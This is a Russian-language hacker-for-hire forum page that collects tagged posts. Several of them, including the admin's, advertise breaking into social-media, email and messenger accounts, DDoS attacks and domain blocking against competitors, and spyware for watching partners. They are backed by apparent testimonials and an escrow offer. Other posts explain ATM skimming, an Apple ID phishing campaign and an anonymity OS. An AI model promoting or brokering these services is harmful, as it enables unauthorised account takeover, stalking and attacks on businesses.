Новости и объявления.
- Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
Search the Community
Showing results for tags 'хакеры'.
-
пресса о нас (подвоз обнальщиков) https://up74.ru/articles/obshchestvo/48560/ видео https://vk.com/video48534878_162947006 это малая часть наших грехов. Общаемся тут https://хакерок.рф я вк https://vk.com/alexey_postnikov2015 но там не общаюсь
-
услуги хакера УСЛУГИ ВЗЛОМА.
DarkWeb posted a question in About professional hackers (ARTICLES AND STORIES).
Начну со своих контактных данных по которым вы сможете ко мне обратиться: [email protected] Взлом почты, аккаунтов в социальных сетях и различных паролей – дело, конечно, не очень хорошее и незаконное. Это может привести к серьезным проблемам, если жертва подаст заявление в правоохранительные органы, и они дознаются о хакере. Однако в некоторых случаях эти действия вполне оправданы, и причина для этого у каждого своя. Если вам нужно узнать какую-либо запаролированную информацию, то лучше всего заказать услуги по взлому паролей. Самостоятельно используя программы делать это лучше не стоит. Они, конечно, дешевле, но в большинстве в них есть вирусы, которые способны принести проблемы. На данном форуме вы можете найти услуги взлома хакером. Сегодня существует множество способов, поэтому заказать услуги взлома легко и просто. Доверять такое дело лучше всего профессионалам, которые полностью разбираются во всех нюансах. А вот непосвященный пользователь может запросто оставить свой след. Все это может привести к серьезным проблемам. К тому же, очень сложно разобраться в способах взлома. На этом сайте я прошел проверку и переживаю услуги по взлому: • аккаунта и паролей; • почты и сайта; • инстаграма и одноклассников; • страниц ВК и так далее. Особенно востребованы услуги взлома соц сетей. Форум самое подходящее место для поиска и предложения услуг в данной области. Здесь заказчик может при заказе услуг взлома ВКонтаке почитать реальные отзывы об исполнителе. Если исполнитель работает хорошо, то у него будет высокий уровень репутации и рейтинг. Услуги по взлому страниц широко распространены, поэтому важно уделять внимание правильному выбору исполнителя. Реальные отзывы обычно написаны простым языком и даже с ошибками, ведь при обычном общении мало кто заботится о правильном написании сообщений. Заказывая услуги по взлому ВК, не забывайте, что вы можете воспользоваться Гарант Сервисом, что обезопасит вас от обмана. Если вы хотите заказать услуги по взлому ватсап или чего-либо другого, помните, что форум это лучшее место. Во всевозможных агентствах и сервисах часто используют заказные отзывы, да и стоимость услуг по взлому вайбера и вотсап у них намного выше.- 3 replies
-
- услуги взлома
- взлом страниц
- (and 7 more)
-
В век информационных технологий мошенники избирают все более изощренные способы обмана. В последние годы самым «популярным» видом денежного мошенничества стало воровство денег с банковских счетов физических лиц. Наивно полагать, что данные карты могу быть украдены только у людей, которые абсолютно не заботятся о своей безопастности и расплачиваются на подозрительных сайтах или отправляют фотографии своей карты в соцсети. Ведь один из самых популярных видов кражи данных с карты - скримминг. Суть этого метода заключается в установке мошенниками дополнительного считывающего устройства на банкомат, которое прочитает всю информацию с карточки и передаст её мошенникам. Помимо этого, устанавливается камера, которая запишет на видео процесс ввода секретного пароля от карты. Иногда вместо камеры используется накладное считывающие устройство на клавиатуру. Независимо от того, какие технологии используют мошенники, понять с первого взгляда, что банкомат был модифицирован бывает очень трудно. Банки знают о таком виде мошенничества и борятся с ним, но хакеры придумывают новые изощрённые методы скримминга, что позволяет им продолжать успешно похищать данные с карт. В чем опасность? Опасность в том что при проводке вашей карты в скимминговое устройство, злоумышленник получает дамп(клон) вашей карты. Далее с этим дампом можно закатать информацию на болванку и пойти в банкомат и украсть все ваши деньги. Насколько знаем в СНГ страхование в этой сфере работает слабенько, в целом нужно страховать карты у банков. Ежедневно крадут сотни тысяч долларов, мало кто возвращает свои деньги обратно. Поехали отдыхать за границу и подключаетесь к местному Free Wi-fi? Сейчас мы поговорим об отдыхе за границей в порядочных отелях. Кто-то едет отдыхать, а кто-то работать. Так же старайтесь не оплачивать счета картой через терминалы. Суть этих мер предосторожности? Когда все едут отдыхать в дорогие отели выплеснуть весь негатив и забыть о проблемах, которые находятся по ту сторону отдыха. Каждый человек начинает расслабляться и теряет бдительность за безопасностью своих электронных счетов, а не которые и даже за своим карманом. А кардеры приезжают в отель, чтобы заработать. В конечном итоге они взламывают местные Wi-fi сети и перехватывают пакеты в сети интернет (Ваш трафик). То есть идет перехват всех данных передаваемых в данной сети. От вводимых адресов, до логинов и паролей, а так же номера карт и остальная информация при оплатах данного человека, каких либо заказов в номер через веб интерфейс ресторана. Таким образом могут перехватить не только банковские данные, а много вашей личной информации. Как видно, перехват данных идет у пользователей через интернет, но платежи совершают не так часто, через веб интерфейс, как оплачивают картой через терминал. Сейчас очень распространена торговля удаленными серверами, то есть компьютерами которые всегда в сети (они занимаются обслуживанием, в данном случае отеля) Через данные компьютеры подключенные к сети и их маршрутизаторов и совершаются платежи через терминал, вся информация о платеже летит с терминала к компьютеру банка. Взломав данный сервер отеля, его заражают вирусом, который перехватывает и сохраняет данные платежей летящих в банки. Даже не находившись в сети данного отеля, а владея доступом к серверу который ведет обслуживание, происходит кража карт, причем в большем количестве, так как платежей проходит намного больше. Подытожим. Снимайте деньги в банкоматах, оплачивайте сервис отеля наличными. Не пользуйтесь публичными WI-FI сетями – или всегда используйте vpn туннелированное подключение, для шифровки передаваемых и получаемых вами данных.
- 1 reply
-
- риски потери денег
- взломать соседа
- (and 6 more)
-
Linux Kodacнi—операционная система, которая базируется на Debian 8.6, предоставит вам надежную, контр криминалистическую и анонимную операционную систему, учитывающую все особенности, в которых будет нуждаться человек, беспокоящийся о своей конфиденциальности, чтобы оставаться в безопасности. Kodacнi очень проста в использовании, все, что вам нужно — это подключить её через USB к вашему компьютеру, затем у вас должна появиться полностью рабочая операционная система с установленным VPN соединением + установленным Tor соединением + запущенной DNScrypt службой. Никаких познаний в Linux или знаний о процессе установки вам не понадобятся, уже обо всем позаботились за вас. Вся ОС функционирует из вашей временной оперативной памяти поэтому, как только вы ее закрываете, никаких следов не остается, информация о всех, совершенных вами действиях уничтожается. Kodacнi является живой операционной системой, которую вы можете запустить практически на любом компьютере с помощью DVD, USB носителя, или SD карты. Её задача заключается в том, чтобы сохранить вашу конфиденциальность и анонимность, и помочь вам: Анонимно использовать интернет. Все интернет подключения проходят через VPN, затем через сеть Tor с DNS шифрованием. Не оставляет никаких следов на используемом вами компьютере. Позволяет использовать современные инструменты кодирования и анонимности для шифровки ваших файлов, писем и мгновенных сообщений. Kodacнi базируется на сжатой Linux Debian с пользовательским XFCE. Это делает Kodacнi стабильной, безопасной, и уникальной. Свойства Kodacнi VPN Ready Tor Ready с возможностью выбора узла выхода DNScrypt ready Truecrypt – keepass – Безопасное облако и многое другое Бесплатный открытый исходный код Произвольный Mac Generator Очистка памяти при завершении работы / перезагрузке Встроенный Tor Browser Pidigin Messenger Bitcoin Wallet Litecoin Wallet Бесплатный встроенный VPN готовый к использованию! DNSCrypt Устройство смены выходных узлов Multi Tor Multi DNS опции Truecrypt/ Vera Crypt Peer Guardian Panic Room/Wipe Ram/Wipe Free Space/Kill OS! Bleachbit/Nautilus-wipe/Keepass2xdotool/Seahorse/Gpa/Gnupg2/Enigmail/ufw/gufw/firejail Komodo Edit/Geany/Krusader/Meld/Shutter/FileZilla/Audicity/Terminator/Transmission/VirtualBox APPS Htop/Rdesktop/Gksu/Ncdu/Xtrlock/Nmap/Pcmanfm/Cairo-dock/Geoip-bin/Sysv-rc-conf/Disper/Smbclient/Syslinux-utils/Fcitx/Ibus/Pidgin-Otr Информация о системе и безопасности на рабочем столе Для входа в качестве обычного пользователя: Код: Username: kodacнi Password:r@@t00 Для входа в качестве супер-пользователя: Код: Username:root Password:r@@t00 Если вам нужно использовать команду Sudo или su как root, пароль останется таким же: r@@t00 Чтобы изменить пароль для пользователя Kodacнi и root в случае, если вы хотите заблокировать ПК, используя ваш собственный пароль, используйте следующую команду в терминале: Код: passwd # меняет пароль Kodacнi su passwd # меняет корневой пароль exit Чтобы запустить windows исполняемые файлы exe вам нужно будет установить wine, для этого используйте следующую команду: Код: sudo apt-get install wine-bin:i386 Для блокировки компьютера нажмите CTRL ALT L или введите для прозрачного блокировщика после нажатия ALT F2: Код: xtrlock Kodacнi идет со многими уже установленными приложениями и инструментами. Вы можете менять страну выхода в Tor одним щелчком также как и перезагружать ваш DNS сервер одним простым нажатием мышки. Вам также не придется волноваться о ваших беспроводных драйверах или драйверах отображения, включены все часто используемые драйвера и проверены. Где использовать: На персональном компьютере или на ноутбуке (запустите через флешку или DVD или на виртуальной машине). На компьютерах профессионального применения В интернет кафе В отелях или во время путешествий В школьных компьютерных классах На любом компьютере, на котором есть DVD ROM или USB порт и есть возможность их использовать. Примечания: Не рекомендуется устанавливать Linux Kodacнi для постоянного использования на любой компьютер, потому что она будет сохранять все ваши настройки на жестком диске, а это идет вразрез с основной задачей любой контр криминалистической операционной системы. Kodacнi — основанная на Debian живая DVD/USB операционная система, что подразумевает, что все пакеты базируются чисто на репозитории Debian. Kodacнi является проектом с открытым исходным кодом с Apache License 2.0 и, прежде всего, коды, используемые в системе, имеют сценарии bash с открытым текстом и включены в пакет ISO без скомпилированных двоичных файлов, открытый код Kodacнi доступен на GitHub. Скачать образ можно здесь https://sourceforge.net/projects/linuxkodachi/
-
- 1
-
-
- анонимность в сети
- система безопасности
- (and 7 more)
-
Фишинг-атака на AppleID Зафиксирована довольно мощная фишинг-кампания против пользователей «яблочной» техники. Кампания по давно уже любимому методу распространяется с помощью спама. Письмо имеет тему, как правило, передающей смысл о том, что произошла ошибка, например, при проведении платежа с applepay. https://pp.userapi.com/c840235/v840235209/7328c/UNw_9N0TNYU.jpg Тело письма в вложением PDF В фишинговом письме приложен PDF-документ, в котором говорится, что «некоторые Ваши данные в профиле AppleID устарели или неверны», необходимо бы их обновить: https://pp.userapi.com/c840235/v840235209/732b0/ZnvIMHkuR84.jpg Тело PDF-вложения. Нет активного содержимого, только 1 ссылка. В принципе, есть и логотип, и подписи. Выдает неоригинальность письма лишь отвратительное качество картинки, видимо, это сделано с целью обхода графических анализаторов спама. Итак, кликнув по ссылке «My Account» пользователя переадресует на фишинговый ресурс, который, в отличие от письма, сделан качественно, и очень сложно отличить от настоящего сайта. https://pp.userapi.com/c840235/v840235209/732f2/80ZzwbmnF_c.jpg Поддельный сайт Apple Если пользователь не заметит разницы и «попадется на крючок», введенные данные отправятся злоумышленникам, и после этой формы авторизации появится еще одна, где мошенники постараются собрать максимально возможную информацию о пользователе. Оперируя такими данными, мошенники смогут получить доступ к Вашему AppleID, iCloud, файлам, документам, медицинской карте (в России как-то не развито такое пока), смогут заблокировать Ваше устройство удаленно и потребовать выкуп за восстановление. Дополнительно можно сказать о сайте то, что сайт весьма неплохо защищен от срабатывания эвристических анализаторов: практически вся начинка страницы зашифрована AES, и прогружается только с помощью расшифровки «налету» из enc.js скрипта. https://pp.userapi.com/c840235/v840235209/73303/Lqsk2XcZyww.jpg Зашифрованная «начинка» страницы и код для дешифровки.
-
- хакер атака
- фишинг
- (and 9 more)
-
Общайтесь на любые темы, какие только пожелаете. Данный раздел не будет пропадать под проверку модераторов и администраторов.
- 26 replies
-
- услуги взлома
- взлом страниц
- (and 9 more)
-
С чего следует начинать, если появилось желание научиться повелевать программными кодами и криптографическими ловушками? Как становятся хакерами? Ведь они способны без особого труда проникнуть в чужой компьютер, попутно взломав несколько паролей. Нет ничего странного в желании стать хакером, ведь каждый хоть раз хотел посмотреть чужую почту или аккаунт. Кто такие хакеры? Итак, как становятся хакерами? В первую очередь потребуется понять, что подразумевается под этим термином. Следует отметить, что хакеры ничего общего не имеют с разного рода злоумышленниками, которые промышляют кражей денег с банковских счетов и атакуют самые разные ресурсы для того, чтобы заблокировать к ним доступ пользователей. Естественно, современные компьютерные умельцы потеряли статус IT-специалиста высшей квалификации. В связи с последними событиями они стали пользоваться плохой репутацией у простых обывателей. А ведь раньше за этим термином скрывались настоящие компьютерные гении, которые были способны исправлять коды в программах, основываясь на собственных нестандартных алгоритмах. Поэтому, задавшись вопросом о том, как становятся хакерами, следует осознать те цели, которых необходимо будет достигать, овладев этой не совсем простой и редкой профессией. Следует учесть, что на современном этапе имеются разного рода ограничения в законах. И игнорировать их нельзя, так как это повлечет за собой ответственность. К тому же мошенничество в сфере программного обеспечения уже является причиной большого количество скандальных историй. И главными героями в них являются именно хакеры, которые, однако, могут претендовать только на лавры воришек чужих денежных средств и секретов. Необходимо изучение языков программирования. Вы хотите еще ответить для себя на вопрос о том, как становятся хакерами? Тогда следует понимать, что без соответствующей подготовки ничего добиться не получится. Карьеру уважаемого эксперта в сфере компьютерных технологий и программ следует начинать с процесса изучения языков программирования. На современном этапе их имеется достаточно много. При этом следует понять, что есть такие языки, которые позволяют общаться непосредственно с персональными компьютерами. С их помощью можно находить решения разного рода задач. Для того чтобы создать автономные программы, применяются современные инструменты. При этом программирование в сети является отдельной отраслью программных кодов с командами, которые позволят структурировать документацию. С их помощью также можно администрировать самые разные процессы в Интернете. Пытаясь разобраться, кто такой хакер, следует отметить, что имеет место быть еще одна категория языков. Речь идет о механизмах проектирования разнообразных программных платформ в компактных устройствах (мобильных телефонах). В связи с этим, делая выбор в пользу определенной сферы деятельности, требуется осуществить выбор соответствующего языка программирования. Именно на нем и надо сконцентрировать наибольшее внимание. Даже простые инструкции требуют знаний. Естественно, для того чтобы взломать электронную почту, на современном этапе можно воспользоваться пошаговыми инструкциями. Однако они не позволят понять, кто такой хакер. Да и принципы работы разных программ, а также тонкости передачи данных в Интернете все равно потребуется изучить. В связи с этим следует сначала попытаться изучить терминологию, характерную для среды хакеров и программистов. Именно посредством специфических терминов можно общаться с компьютерными специалистами, не опасаясь дилетантов, которые не имеют достаточных знаний для понимания особого «языка». Не интересуюсь этой темой / Уже купил Навязчивое и надоело Сомнительного содержания или спам Мешает просмотру контента Спасибо, объявление скрыто. Яндекс.Директ Необходимо изучать операционные системы Как стать хакером? Уроки, за счет которых можно изучить данную область деятельности, потребуют достаточно много времени, сил и желания. Что еще необходимо, кроме изучения терминологии и языка программирования? Следует научиться читать операционные системы. Хакерским семейством считается Unix/Linux. Достаточно важной особенностью Unixes является открытость кода. Можно читать, каким образом была написана операционная система. Имеется возможность досконального ее изучения. Также можно предпринять попытки относительно изменения чего-либо. Кроме того, Unix/Linux ориентируется на Интернет. Требуется изучение Интернета и принципов написания скриптов. Чтобы стать хакером, необходимо разобраться, каким образом следует использовать Всемирную паутину. Также следует понимать принципы написания HTML. Web – серьезное исключение, большая игрушка для хакеров. Как было сказано политиками, Интернет способен изменить мир. И только по этой причине с ним необходимо научиться работать. В том случае, если язык программирования изучен еще не был, писание на HTML поможет приобрести некоторые полезные навыки. Они пригодятся в момент освоения программных кодов и принципов их написания. В связи с этим требуется научиться делать хотя бы домашние странички. Следует также попробовать XHTML. Он более аккуратно проработан по сравнению с классическим HTML. Технически Всемирная паутина представляет собой комплекс компьютерных сетей. Однако на современном этапе это достаточно важная среда коммуникации, которая может быть использована для выполнения самых разных задач. Следует понимать, что российские хакеры обязаны знать английский. Это связано с наличием большого количества информации, которая доступна только на этом языке. Никакой монотонности быть не должно. Быть специалистом в области компьютеров, программ и всемирной сети – огромное удовольствие. Однако для этого потребуется приложить максимум усилий. Соответственно, необходима мотивация. Чтобы быть хакером, необходимо получать удовольствие от процесса решения проблем в момент оттачивания навыков и тренировки интеллекта. Специалистам такого уровня никогда не бывает скучно долго и кропотливо изучать массу языков и программ, и работа им не кажется монотонной. Они делают то, что им нравится. Некоторые советы, о которых не стоит забывать. Как стать хакером? Набор программ (операционные системы, языки программирования, открытые коды и т.п.), знание английского языка, стремление к постижению чего-то нового – все это поможет в достижении поставленных целей. Но что еще следует помнить? Не надо забывать о том, что для того, чтобы стать одним из лучших в своем деле, требуется решать только самые сложные задачи. Не надо обладать слишком высоким самомнением. Просто необходимо ставить перед собой цели, развиваться день ото дня. Если что-то не было понятно сегодня, то завтра следует постараться разобраться в сложном вопросе. Если не был получен новый навык, то, скорее всего, день прошел зря. Не следует делать себе поблажек. Не все компьютерные специалисты одинаковы. Имеются те, кто интересуется только получением прибыли. Есть такие, которые стремятся к знаниям и информации, иногда при этом преступая черту закона. Но все знаменитости-хакеры характеризуются наличием разных целей. Именно это позволяет им добиваться значительных высот в своей профессии. Являясь новичком, не надо пытаться взломать крупные корпорации либо государственные структуры. Следует понимать, что люди, которые отвечают за безопасность данных систем, скорее всего, в своем деле разбираются намного лучше. Следует отметить, что такие специалисты даже в момент обнаружения вторжения не станут оперативно реагировать. Они сначала дождутся, пока хакер не наследит серьезно. Другими словами, новичок может ощущать себя в безопасности после взлома, продолжая исследование систем, к примеру, на наличие уязвимостей. А специалисты в это время активно заманивают их в ловушку. Необходимо постоянно совершенствоваться, изучая специализированную литературу. Заключение На основе всего вышесказанного можно сделать вывод. Надо постоянно изучать самые разные дисциплины, языки, литературу, сеть. Хакеров не так уж и много. Поэтому, чтобы стать одним из них, необходимо изначально готовить себя к кропотливой и долгой работе в первую очередь над самим собой. И еще, если с детства вы не любили решать логические задачи, то стоит попробовать найти для себя иное занятие, которое не требует мозгового штурма, максимальной усидчивости и серьезного терпения.
-
- услуги взлома
- услуги хакера
-
(and 4 more)
Tagged with:
-
услуги хакера Услуги взлома.
Admin posted a question in About professional hackers (ARTICLES AND STORIES).
http://rwf-img.iheart.com/2135/2016/01/default/hacker_0_1453455870.jpg Взлом почты, аккаунтов в социальных сетях и различных паролей – дело, конечно, не очень хорошее и незаконое. Однако в некоторых случаях эти действия вполне оправданы, и причина для этого у каждого своя. Если вам нужно узнать какую-либо запаролированную информацию, то лучше всего заказать услуги по взлому паролей. Самостоятельно используя программы делать это лучше не стоит. Они, конечно, дешевле, но в большинстве в них есть вирусы, которые способны принести проблемы. На нашем форуме вы можете найти услуги взлома хакером. Сегодня существует множество способов, поэтому заказать услуги взлома легко и просто. Доверять такое дело лучше всего профессионалам, которые полностью разбираются во всех нюансах. А вот непосвященный пользователь может запросто оставить свой след. Все это может привести к серьезным проблемам. К тому же, очень сложно разобраться в способах взлома. На нашем форуме представлены услуги по взлому: • аккаунта и паролей; • почты и сайта; • инстаграма и одноклассников; • страниц ВК и так далее. Особенно востребованы услуги взлома соц сетей. Наш форум самое подходящее место для поиска и предложения услуг в данной области. Здесь заказчик может при заказе услуг взлома ВКонтаке почитать реальные отзывы об исполнителе. Если исполнитель работает хорошо, то у него будет высокий уровень репутации и рейтинг. Услуги по взлому страниц широко распространены, поэтому важно уделять внимание правильному выбору исполнителя. Реальные отзывы обычно написаны простым языком и даже с ошибками, ведь при обычном общении мало кто заботится о правильном написании сообщений. Заказывая услуги по взлому ВК, не забывайте, что вы можете воспользоваться Гарант Сервисом, что обезопасит вас от обмана. Если вы хотите заказать услуги по взлому ватсап или чего-либо другого, помните, что форум это лучшее место. Во всевозможных агентствах и сервисах часто используют заказные отзывы, да и стоимость услуг по взлому вайбера и вотсап у них намного выше, нежели у частных исполнителей.-
- услуги взлома
- взлом страниц
- (and 11 more)
-
Здравствуйте, я хотел поблагодарить вас за такой замечательный ресурс, наконец-то мне помогли, что именно заказывал у хакера я писать не буду. Но скажу лишь одно. Я решил написать отзыв после того как мне помогли на этом сайте, помог мне пользователь чья почта XakerFox, выполнил работу бысто и без каких либо проблем. Благодаря ему я решил много вопросов которые не давали мне покоя, узнал кто меня окружает и что задумали эти люди. вообщем я очень вам благодарен, мне нравится что на вашем сайте услуги хакера на высоте, спасибо!
- 1 reply
-
- отзывы о работе xakerpro
- услуги хакера
- (and 8 more)
-
Услуги профессиональных хакеров:
Admin posted a question in About professional hackers (ARTICLES AND STORIES).
Рад приветствовать каждого пользователя который решил посетить xakersay. Сегодня решил обсудить по-видимому достаточно популярную тему. В которой будем вести обсуждение хакеров и услуги которе они предоставляют. Большая часть сюда перешли в надежде найти специалиста который оказал бы подобные услуги! Я уверен если вы по юзаете мой форум обязательно найдете такого человека. Мир в котором интернет технологии развиваются с бешеной скоростью услуги подобного рода имеют большую актуальность. Практически 70% современного бизнеса услуг связанно с рекламой в глобальной сети. Конкуренция между бизнесменами растет буквально по часам, многие желают применить хитрости и обратиться за помощью к специалистам. Даже пренебрегая законодательством Российской Федерации, давайте рассмотрим основные услуги этого рынка: Блокировка доменных имен: Зачастую возможная конкуренция разворачивается между сайтами. Которые пытаются вылезти в топовые позиции поисковых систем. Пренебрегая рядом фактором соперники готовы на любые шаги! Один из лучших вариантов заставить отступить своего оппонента. Заблокировать домен его сайта, во-первых это отразится на всей СЕО компании примененной к сайту! Во-вторых, подобные действия испугают вашего врага от подобных посягательств на клиентов. ДДос атаки: Еще один вариант опустить конкурента с небес на землю, обращаясь к хакеру за услугами досс. Вы гарантированно получаете временное отсутствие потенциального недруга в сети. Преобладая в поиске в это время. Отметим заблокировать домен выйдет достаточно дешевле чем, постоянно пользоваться досс атаками. Удаление негатива: За годы работы в сфере хакинга, ко мне обращались различные люди с различными проблемами. Частенько были соотечественницы жившие в Европе или Соединённых Штатах Америки. Засветившиеся на порталах связанных с порнографией. Приходилось удалять всю информацию, которую оставляли бывшие работодатели девушек. Личности с просьбой удалить фейковый аккаунт в tweetr и других социальных сетях. Подобные услуги хакеров стоят достаточно хорошо, и многим увы не по карману. Удаления негативно содержащего видео на youtube, администрации лояльно относится к видеозаписям содержащим информацию о какой-либо личности. Вспоминаются на моей памяти и негативные клиенты! Помните по всей стране ходили видео с большим накаченным скинхедом по имени ТЕСАК? Занимался он ловлей педофилов на живца, после чего избивал недолюдей и выкладывал запись в всемирную паутину. За лето когда этот парень проявлял максимальную активность ко мне обратились десятки педофилов с просьбой удалить и заблокировать аккаунт. Сейчас я подобным вещами не занимаюсь, скажу откровенно я их обманывал! Удалял запись, получал оплату сразу же восстанавливал! Считая действия этих людей аморальными, думаю я имел на это полное право и гражданскую позицию! Удаление отзывов: Пакости ненавистников и конкурентов, оставляют негативную информации о честных людях в интернете! Найти проверенного хакера который произвел удаления подобных тем достаточно тяжело. Необходим специалист оказывающий услуги не первый год своим клиентам. Представьте обыкновенный риэлтер, честный оказывающий не дорогие услуги. В общем пользующейся спросом знаток своего дела. Создается простая тема на форуме, и начинаются зарисовки негативных отзывов. Мол дилетант, обманул меня на кругленькую сумму! Если завистник вашей популярности заходит достаточно далеко, таких сообщений может быть очень много! Когда тема появляется в индексе сделать практически не чего нельзя. Особенно когда администрация форума не активна или принципиальна! Приходится пользоваться услугами специалистов, в данном случае хакеров. Платить деньги не понятно за что! Взлом социальных сетей: Нанять хакеры для взлома вконтакте или одноклассников, рядовое занятие! Тысячи людей пытаются сделать это ежедневно. Проверить любимую девушку на верность, или с кем общается ваш парень обыдённые причины обращения к программистам самоучкам. Читать мессенеджеры сообщений: Смартфоны, определить место расположение и многое другое. Все это под силу сделать обыкновенному взломщику. Вибер и whatsapp, стремительно завоевывают место подобных приложений в нашем обществе. Судя по росту выходит достаточно удачно! Русский человек от природы любит халяву, вибер и есть бесплатный вариант отправлять сообщения пользователям по всему миру! Как правильно заказать услуги у хакеров: Все большую актуальность подобные услуги взлома обретают у человечества в целом. Многие понимая этот факт, но не имея возможность предоставить их! Становятся мошенниками, обманывающими рядовых граждан. Расскажу принцип работы с хакерами без обмана: №1. Действия которые вы просите совершить должны обязательно быть выполненными, по этому рекомендую обращаться только к проверенным специалистам. №2. Предлагайте работать через гарант сервис, работая через гарантов у вас будет возможность получить услуги которые вы заказывали! Честный и профессиональный гарант стоит достаточно не дорого. Порядка 7-10% от суммы сделки. Если исполнитель согласился работать через гаранта это уже характеризует его с положительной стороны. №3. Как правило, старайтесь просить предоставить доказательства выполненной работы, если такой возможности нет пользуемся гарантом!-
- услуги взлома
- взлом страниц
- (and 13 more)
-
В последнее время в мире телекоммуникаций наблюдается повышенный интерес к виртуальным частным сетям (Virtual Private Network - VPN). Это обусловлено необходимостью снижения расходов на содержание корпоративных сетей за счет более дешевого подключения удаленных офисов и удаленных пользователей через сеть Internet. Действительно, при сравнении стоимости услуг по соединению нескольких сетей через Internet, например, с сетями Frame Relay можно заметить существенную разницу в стоимости. Однако необходимо отметить, что при объединении сетей через Internet, сразу же возникает вопрос о безопасности передачи данных, поэтому возникла необходимость создания механизмов позволяющих обеспечить конфиденциальность и целостность передаваемой информации. Сети, построенные на базе таких механизмов, и получили название VPN. Кроме того, очень часто современному человеку, развивая свой бизнес, приходится много путешествовать. Это могут быть поездки в отдаленные уголки нашей страны или в страны зарубежья. Нередко людям нужен доступ к своей информации, хранящейся на их домашнем компьютере, или на компьютере фирмы. Эту проблему можно решить, организовав удалённый доступ к нему с помощью модема и телефонной линии. Использование телефонной линии имеет свои особенности. Недостатки этого решения в том, что звонок с другой страны стоит немалых денег. Есть и другое решение под названием VPN. Преимущества технологии VPN в том, что организация удалённого доступа делается не через телефонную линию, а через Internet, что намного дешевле и лучше. По моему мнению, технология. VPN имеет перспективу на широкое распространение по всему миру. 1.1 Что такое VPN VPN (англ. Virtual Private Network - виртуальная частная сеть) - логическая сеть, создаваемая поверх другой сети, например Internet. Несмотря на то, что коммуникации осуществляются по публичным сетям с использованием небезопасных протоколов, за счёт шифрования создаются закрытые от посторонних каналы обмена информацией. VPN позволяет объединить, например, несколько офисов организации в единую сеть с использованием для связи между ними неподконтрольных каналов. По своей сути VPN обладает многими свойствами выделенной линии, однако развертывается она в пределах общедоступной сети, например Интернета. С помощью методики туннелирования пакеты данных транслируются через общедоступную сеть как по обычному двухточечному соединению. Между каждой парой «отправитель-получатель данных» устанавливается своеобразный туннель - безопасное логическое соединение, позволяющее инкапсулировать данные одного протокола в пакеты другого. Основными компонентами туннеля являются: инициатор; маршрутизируемая сеть; туннельный коммутатор; один или несколько туннельных терминаторов. Сам по себе принцип работы VPN не противоречит основным сетевым технологиям и протоколам. Например, при установлении соединения удаленного доступа клиент посылает серверу поток пакетов стандартного протокола PPP. В случае организации виртуальных выделенных линий между локальными сетями их маршрутизаторы также обмениваются пакетами PPP. Тем не менее, принципиально новым моментом является пересылка пакетов через безопасный туннель, организованный в пределах общедоступной сети. Туннелирование позволяет организовать передачу пакетов одного протокола в логической среде, использующей другой протокол. В результате появляется возможность решить проблемы взаимодействия нескольких разнотипных сетей, начиная с необходимости обеспечения целостности и конфиденциальности передаваемых данных и заканчивая преодолением несоответствий внешних протоколов или схем адресации. Существующая сетевая инфраструктура корпорации может быть подготовлена к использованию VPN как с помощью программного, так и с помощью аппаратного обеспечения. Организацию виртуальной частной сети можно сравнить с прокладкой кабеля через глобальную сеть. Как правило, непосредственное соединение между удаленным пользователем и оконечным устройством туннеля устанавливается по протоколу PPP. Наиболее распространенный метод создания туннелей VPN - инкапсуляция сетевых протоколов (IP, IPX, AppleTalk и т.д.) в PPP и последующая инкапсуляция образованных пакетов в протокол туннелирования. Обычно в качестве последнего выступает IP или (гораздо реже) ATM и Frame Relay. Такой подход называется туннелированием второго уровня, поскольку «пассажиром» здесь является протокол именно второго уровня. Альтернативный подход - инкапсуляция пакетов сетевого протокола непосредственно в протокол туннелирования (например, VTP) называется туннелированием третьего уровня. Независимо от того, какие протоколы используются или какие цели преследуются при организации туннеля, основная методика остается практически неизменной. Обычно один протокол используется для установления соединения с удаленным узлом, а другой - для инкапсуляции данных и служебной информации с целью передачи через туннель.
- 2 replies
-
- обойти блокировку
- взлом
- (and 5 more)
-
Внимание. В Связи с переездом сайта на новый хостинг, были перебои в работе сервиса. В донный момент работа восстановлена, сайт работает в обычном режиме. ФОРУМ ХАКЕРОВ И ПРОГРАММИСТОВ.
- 2 replies
-
- хакерские сайты
- форум хакеров
-
(and 7 more)
Tagged with:
-
Хочу поблагодарить создателя такого замечательного проекта как этот. На этом сайте хакеров я нашла много полезной для себя информации и главное что мне здесь выполнили взлом сайта моего молодого человека, я очень рада что на его странице в однокласниках я не нашла подтверждения моих догадок по поводу измены, теперь я уверена в своём парне и могу не раздумывать дальше по поводу его предложения руки и сердца. Спасибо исполнителю заказа. Для тех кто думает к кому обратиться, рекомендую [email protected] ЛУЧШИЙ К КОМУ Я ОБРАЩАЛАСЬ.
-
Здравствуйте гости и пользователи сайта xakervip.com В данной ветке я буду помогать разбераться с проблемами по услугам хакеров. Если вдруг возник спорный вопрос или какая-то проблема прошу писать в теме для дальнейшего разбирательства. Не решаемых проблем не бывает. http://www.classifieds365.net/_content/items/images/35/8282635/001.jpg
- 3 replies
-
- 1
-
-
- рассмотрение жалоб
- форум хакеров
-
(and 3 more)
Tagged with:
-
Доброго времени суток уважаемые гости и друзья форума опытных хакеров и программистов. Хочу поделится с вами ссылками на программы шпионы, которые доступны для скачивания на андроид, скачать можно прям с маркета Гугл, вообщем смотрите, если такие программы, их кстати можно назвать тоже хакерскими в своем роде. Их можно скачать легально, вы убедитесь в том что это очень интересные и кому то даже полезные програмки! А после того как вы их протестируете, то что уж тут говорить о программах разработаных для взлома опытным хакером профессионалом. Профессиональный хакер сделает гораздо более детально и качественно свою работу с программой для взлома которая направлена именно на это. Программы для слежки, это очень распространенный метод выявления человека которого подозреваете в чем либо. Форум профессионального хакера XAKERSAY рекомендует ознакомится с функционалом данных программ. ПРОГРАММЫ ДЛЯ РАБОТЫ НАД САЙТОМ ВКОНТАКТЕ (Vk) НАЧНЕМ С НИХ. 1.Наслаждайтесь общением ВКонтакте, оставаясь невидимыми! Новый клиент для ВКонтакте (VK.com). Наслаждайтесь общением, оставайтесь невидимыми! Без рекламы и платных функций! ✓ Друзья ✓ Ответы ✓ Новости ✓ Закладки ✓ Документы ✓ Диалоги, чаты ✓ Группы и встречи ✓ Материалы беседы ✓ Альбомы и фотографии ✓ Разноцветные темы оформления ✓ Лайки, репосты, 